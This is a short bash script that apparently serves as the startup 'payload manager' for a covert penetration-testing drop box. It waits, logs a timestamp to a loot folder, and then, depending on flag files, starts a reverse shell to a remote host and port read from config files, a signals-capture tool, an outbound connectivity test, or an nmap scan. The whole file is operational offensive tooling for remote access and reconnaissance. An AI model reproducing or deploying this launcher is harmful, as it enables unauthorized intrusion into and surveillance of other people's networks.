#!/bin/bash
#Copyright(C) 2020  saintcrossbow@gmail.com
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program.If not, see<http://www.gnu.org/licenses/>

# Run payload manager
sleep 30
date > /loot/lastrun.txt
if [ -f /payloads/start_rs ]; then
  r_host="$(</payloads/rhost)"
  r_port="$(</payloads/rport)"
  /bin/bash /usr/local/bin/reverse_shell $r_host $r_port &
fi
if [ -f /payloads/start_si ]; then
  totaltime="$(</payloads/sigintsecs)"
  /bin/bash /usr/local/bin/sigint $totaltime &
fi
if [ -f /payloads/start_ot ]; then
  /usr/local/bin/outbound_test &
fi
if [ -f /payloads/start_nmap ]; then
  /usr/local/bin/std_nmap &
fi
